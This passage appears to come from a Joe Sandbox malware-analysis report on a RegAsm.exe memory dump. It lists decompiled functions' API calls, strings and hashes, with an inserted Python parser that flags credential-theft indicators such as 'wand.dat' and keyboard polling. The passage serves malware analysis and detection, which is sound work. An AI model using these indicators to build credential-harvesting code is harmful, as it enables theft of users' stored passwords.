                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                • String ID: \StringFileInfo\
                                                                                • API String ID: 102104167-2245444037
                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$??3@
                                                                                • String ID: g4@
                                                                                • API String ID: 3314356048-2133833424
                                                                                • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _memicmpwcslen
                                                                                • String ID: @@@@$History
                                                                                • API String ID: 1872909662-685208920
                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004100FB
                                                                                • memset.MSVCRT ref: 00410112
                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                • String ID: </%s>
                                                                                • API String ID: 3400436232-259020660
                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                • String ID: caption
                                                                                • API String ID: 1523050162-4135340389
                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                APIs
                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 210187428-168460110
                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp
                                                                                • String ID:
                                                                                • API String ID: 3384217055-0
                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040560C
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.*$dat$wand.dat
                                                                                • API String ID: 2618321458-1828844352
                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00412057
                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                • String ID:
                                                                                • API String ID: 3550944819-0
                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                • memcpy.MSVCRT ref: 0040A94F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 3023356884-0
                                                                                • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                • memcpy.MSVCRT ref: 0040B248
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 3023356884-0
                                                                                • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                • memcpy.MSVCRT ref: 0040B159
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                • String ID:
                                                                                • API String ID: 1171893557-0
                                                                                • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004144E7
                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                • memset.MSVCRT ref: 0041451A
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1127616056-0
                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
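The records above follow one layout per function: the APIs it calls, each with its call-site address and, for calls made from inside a callee, a "Part of subcall function <addr>:" prefix; the strings it references, joined by "$" in String ID; and similarity hashes, where API String ID is the pair "<hash of API ID>-<hash of String ID>" (the second half is 0 for records with no strings, and two records with identical IDs, such as the two wcslen/??3@YAXPAX@Z records above, are near-duplicate functions). The Python below is an added example and is not part of the Joe Sandbox report: it parses this listing into records, groups them by API String ID, and flags capability indicators such as the wand.dat string (Opera's password store) in the record above and the GetPrivateProfileStringW/WritePrivateProfileStringW pair in the last one. The indicator tables are analyst assumptions, and the embedded sample is copied, abridged, from this section.

```python
"""Parser for the Joe Sandbox IDA-plugin function records listed in this report
section. Added example, not part of the Joe Sandbox report."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
# Constructed input: four records copied (abridged) from this report section.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
APIs
• memset.MSVCRT ref: 004144E7
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
Similarity
• String ID:
• API String ID: 1127616056-0
APIs
• wcslen.MSVCRT ref: 0040A8E2
• ??3@YAXPAX@Z.MSVCRT ref: 0040A908
Similarity
• API String ID: 3023356884-0
APIs
• wcslen.MSVCRT ref: 0040B1DE
• ??3@YAXPAX@Z.MSVCRT ref: 0040B201
Similarity
• API String ID: 3023356884-0
"""
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<name>.<MODULE>[(<args>)][,] ref: <call site>", optionally behind "Part of subcall function <addr>:"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^\s(]+?)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
@dataclass
class ApiCall:
    name: str
    module: str
    ref: str              # call-site address
    args: list[str]
    subcall: str | None   # callee address when reported under "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # every "Key: value" bullet

    @property
    def strings(self) -> list[str]:
        return [s for s in self.fields.get("String ID", "").split("$") if s]

def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":          # every record opens with its APIs block
                records.append(FunctionRecord())
            section = line
            continue
        if not line or not records:
            continue
        line = line.lstrip("•").strip()
        if section == "APIs":
            if m := API_RE.match(line):
                args = m["args"].split(",") if m["args"] else []
                records[-1].calls.append(ApiCall(m["name"], m["mod"], m["ref"], args, m["sub"]))
        else:
            key, sep, value = line.partition(":")   # first colon only: "Source File: ..., Offset: ..."
            if sep:
                records[-1].fields[key.strip()] = value.strip()
    return records

# Analyst-chosen capability indicators (assumption, not from the report).
API_INDICATORS = {"GetPrivateProfileStringW": "reads INI-style config",
                  "WritePrivateProfileStringW": "writes INI-style config",
                  "GetKeyState": "polls keyboard state (keylogging)",
                  "ShellExecuteW": "launches an external program"}
STRING_INDICATORS = {"wand.dat": "Opera password store (credential theft)"}

def flag_record(rec: FunctionRecord) -> list[str]:
    hits = [f"{'subcall ' if c.subcall else ''}{c.name}@{c.ref}: {API_INDICATORS[c.name]}"
            for c in rec.calls if c.name in API_INDICATORS]
    return hits + [f"string {s!r}: {STRING_INDICATORS[s]}" for s in rec.strings if s in STRING_INDICATORS]

def group_by_api_hash(records: list[FunctionRecord]) -> dict[str, list[int]]:
    groups: dict[str, list[int]] = {}   # full API String ID -> record indices (near-duplicates)
    for i, rec in enumerate(records):
        groups.setdefault(rec.fields.get("API String ID", ""), []).append(i)
    return groups
```

Running `parse_records` over a whole report section and then `group_by_api_hash` collapses the listing to one entry per distinct API String ID, which is the quickest way to see how many distinct routines the dump actually contains; `flag_record` then points at the few records worth opening in a disassembler first. The regex keys on the exact punctuation Joe Sandbox emits (a comma after the argument list, none when there is no list), so a changed report format will silently drop calls rather than misparse them; check `len(rec.calls)` against the listing when applying it to a new report.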
                                                                                APIs
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                • malloc.MSVCRT ref: 00417459
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                • String ID:
                                                                                • API String ID: 4284152360-0
                                                                                • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 2678498856-0
                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                • malloc.MSVCRT ref: 00417407
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                • String ID:
                                                                                • API String ID: 4284152360-0
                                                                                • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F673
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
